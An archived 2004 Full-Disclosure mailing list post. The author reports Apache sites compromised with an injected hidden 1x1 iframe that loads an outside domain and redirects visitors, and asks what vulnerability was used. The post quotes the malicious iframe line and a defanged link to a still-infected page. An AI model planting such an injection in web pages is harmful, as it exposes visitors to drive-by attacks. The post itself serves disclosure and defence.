[Full-Disclosure] browser hijack by apache sites
From: Filbert (filbert_at_pandora.be)
Date: 05/23/04
- Previous message: Thierry Carrez: "[Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird"
- Next in thread: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: Ian Latter: "Re:[Full-Disclosure] browser hijack by apache sites"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Sun, 23 May 2004 15:19:30 +0200
Hi,
This is the second time this weekend that I've been warned of an apache site
on a Linux server were a line of code was added to redirect browsers to porn
sites.
First was the site of a Belgian political party. Second came today, and as of
writing this it's still there. The admin was informed so it can be gone soon.
hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
IE users do NOT click.
the code added at the bottom is:
<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body>
anyone seen this before? What vulnerability is exploited here? FP?
Thx,
Filb.
-- echo "+++ATH0filb@+++ATH0filb@linuxmail.org" | sed 's/+++ATH0//g' _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Thierry Carrez: "[Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird"
- Next in thread: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: Ian Latter: "Re:[Full-Disclosure] browser hijack by apache sites"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
